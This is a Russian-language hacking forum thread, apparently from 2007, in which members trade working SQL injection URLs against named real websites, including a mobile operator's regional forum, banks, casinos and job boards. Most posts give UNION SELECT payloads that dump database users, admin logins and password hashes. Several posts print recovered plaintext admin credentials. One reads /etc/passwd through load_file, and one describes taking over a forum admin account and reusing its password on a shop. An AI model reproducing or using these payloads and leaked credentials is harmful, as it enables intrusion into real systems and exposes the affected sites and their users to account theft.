SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. FFFFx029A

    FFFFx029A Member

    Joined:
    30 Sep 2007
    Messages:
    9
    Likes Received:
    8
    Reputations:
    3
    Заюзать реально? (MSSQL)
    http://www.reonline.ru/offers/556623.cnt?page=2&o_object=3'&o_type=1
     
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Админим форум Мегафона

    Ну вобщем ничего сложного нет, поэтому выкладываю сюда, а там на рассмотрение модеров...

    вобщем нашел скулю:
    Code:
    http://bashkortostan.[B][COLOR=Red]megafonvolga.ru[/COLOR][/B]/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(user,':',password),4,5,6,7+from+mysql.user/*
    я думаю все знают, что это такое, но воспользоваться этим не получится, так как на серваке открыт только 80 порт (HTTP)
    увидел, что на серве есть форум (он относится, к всему мегафону поволжья), форум самописный, так, что пришлось воспользоваться интуицией и она меня не подвела:
    Code:
    http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,3,4,5,6,7+from+[B]forumusers[/B]/*
    дальше пришлось подбирать поля, почти во всех подобных таблицах есть поле id, остается только найти префикс (ну или типа этого). Опять же интуиция вкупе с логикой не подвели:
    Code:
    http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,[B]fu_id[/B],4,5,6,7+from+forumusers/*
    дальше подбирать поля - дело техники и вот конечный результат:
    Code:
    [B]http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(fu_name,':',fu_pwd),4,5,6,7+from+forumusers+where+fu_id=1/*[/B]
    как видим пароль в чистом виде, логинимся на форуме и становимся админами... для того, что б войти в панель админа надо нажать на ссылку "аватары" вверху появится окно бейсик авторизации, в него вводим эти же логин/пасс и админим форум... все...

    ЗЫ еще нашел там таблички:
    Code:
    news
    dealers
    phones
    PPS логин/пароль форума подходит к магазину
     
    2 people like this.
  3. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Code:
    http://www.butterslice.com/browsecats.php?cid=51%20union%20select%201,concat(sb_pwd,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    pcquestnb:pcquestnb

    Code:
    http://www.ro-jobs.ro/browsecats.php?cid=48%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    admin:q7w7e7r7

    Code:
    http://ph.jobcentralasia.com/browsecats.php?cid=46%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    admin:qwertyuiop

    Code:
    http://www.buljob.com/search_result.php?cid=970000%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
    admin:I4ipBuOFUSuVaak2Y66*
     
    3 people like this.
  4. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.host.uzip.uz/search_result.php?cid=-10+union+select+1,VERSION(),3,4/*
    Code:
    http://www.all-horse-classifieds.com/browsecats.php?cid=-26+union+select+1,VERSION(),3,4,5/*
     
    #3264 SWAT, 10 Oct 2007
    Last edited: 10 Oct 2007
    1 person likes this.
  5. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    офсайт города Бельцы :)

    код:

    http://www.beltsy.md/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=-1+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12+from+sedoi_users/*
    ____________________________________________________________



    www.seejob.md


    код:

    http://www.seejob.md/?page=view&t=0&id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(table_name,0x3a,column_name),15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+limit+1374,1/*
     
    #3265 sasTO, 10 Oct 2007
    Last edited: 10 Oct 2007
    2 people like this.
  6. Underwit

    Underwit Banned

    Joined:
    6 Oct 2006
    Messages:
    191
    Likes Received:
    137
    Reputations:
    16
    http://www.bmoca.org/admin/

    usename:bmoca
    password:bm0c@
     
    1 person likes this.
  7. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    http://www.ur0mc.com/ru/photo.php?id=-1+union+select+1,version()/*
     
    1 person likes this.
  8. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.dandbpoker.com/book_detail.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,data base()),5,6,7,8,9,10,11,12,13,14/*
    [email protected]:4.1.22-standard-log:harakis
    Code:
    http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3 a,database()),4,5,6/*&parent=
    mediamarket@localhost:5.0.33:mmg_hpoker
    Code:
    http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,password),4,5 ,6+from+mys ql.user+limit+0,1/*&parent=
    root:*E459468099CBA6AEE7E679233A154F2DA83C23F8
    banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B6E8307E1
    mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B66CF7
    Code:
    http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,versio n(),0x3a,database()),4, 5,6/*& parent=
    mediamarket@localhost:5.0.33:mmg_pokertut
    Code:
    http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,pa ssword),4,5,6 +from+mysql.us er/* &parent=
    root:*E459468099CBA6AEE7E679233A154F2DA83C23F8
    banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B6E8307E1
    mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B66CF7
    Code:
    http://www.casino-fr-bonus.com/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,vers ion(),0x3a,database()),6,7,8,9,10,11/*
    [email protected]:5.0.22-Debian_2-log:user9718a1
    h*tp://www.grandscasinos.com /it/id.php?ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*
    h*tp://www.casino-online-fr.com /ru/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11
    h*tp://www.7casinoonline.com /it/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11
    h*tp://www.equipodepoker.com /index.php ' or 1=1/*
    h*tp://www.rakemeback.com /my-account/ ' or 1=1/*
     
    4 people like this.
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://acc.com/php/cms/index.php?id=1/**/union/**/select/**/null,null,null,null/**/from/**/user--
     
  10. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    DOS CREDO BANK


    код:


    http://www.credo.com.kg/news/?id=-8+union+select+1,cast(concat_ws(0x3a,version(),user(),database())+as+binary)/*

    ! HELP !

    5 мускул, но вывода колонок и таблиц через information_schema так и не смог! Что тут за заморочка?
     
    #3270 sasTO, 11 Oct 2007
    Last edited: 11 Oct 2007
    2 people like this.
  11. te$t

    te$t Elder - Старейшина

    Joined:
    8 Aug 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    5
    Code:
    http://www.ubisoft.ru/games/game.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11+from+news/*
     
    1 person likes this.
  12. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    starz.ru
    http://starz.ru/photo/?celeb=-64+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3/*


    uralmoto.ru логин/хеш/уин
    http://uralmoto.ru/stories.php?sid=-1'+union+select+1,2,3,4,5,concat(username,0x3a,user_password,0x3a,user_icq),7,8,9,10,11,12+from+phpbb_users+limit+1,1/*

    надеюсь не бояны ))
     
    3 people like this.
  13. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://sc-ufa.uraltb.ru/?id=99999+union+select+1,2,3/*
     
  14. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    хеши:
    member:4e4d6c332b6fe62a63afe56171fd3725 расшифровал:haha
    ian:919b720497e91197077a706775c5a9ad
    adam:2e456fdbaadea50686a5809d9c540243
    http://www.lanchesterbrassband.org.uk/login.php member:haha
     
    1 person likes this.
  15. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Заказываем девочек :) ...


    код:


    http://elit.tv/index.phtml?id=-42+union+select+1,concat_ws(0x3a,id,name,passwd),3,4,5,6,7,8,9,10,11+from+admin_users/*


    ...но для начала нужно найти админку ;)
     
    2 people like this.
  16. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    ЗАО "МОССТРОЙЭКОНОМБАНК"
    Версия: 5.0.41-log
    usoftadmin:f02539ca4eff95f24c00d82eb62e275e:xtrfen
    mseb:6d390ae485e95ceac9ce280f02d0c409
    Жаль обминку найти не смог (
     
    2 people like this.
  17. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 0nep@t0p
    http://www.mseb.ru/adm/login.php?ref=%2Fadm%2Findex.php вот админка
     
    1 person likes this.
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),icq_number,concat(ip_address,0x3a,email),7,8+from+vitz_forums.ibf_members/*

    Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
     
    2 people like this.
  19. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    4.1.21-standard
    barrowfc_results
    barrowfc_barrowf@localhost


    4.0.24
    enlajugada
    enlajugada@localhost


    4.1.22-standard
    henrybcu_dbflatam
    henrybcu_f1lat07@localhost


    5.0.45-community-log
    Sql154922_1
    [email protected]
     
    #3279 NOmeR1, 12 Oct 2007
    Last edited: 12 Oct 2007
    3 people like this.
  20. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    www.autozel.ru

    http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13/*

    4.1.11:autozel1_aaaa:website@localhost

    http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_icq),5,6,7,8,9,10,11,12,13+from+phpbb_users+limit+1,1/*

    имя \ хеш \ уин
     
    1 person likes this.
Thread Status:
Not open for further replies.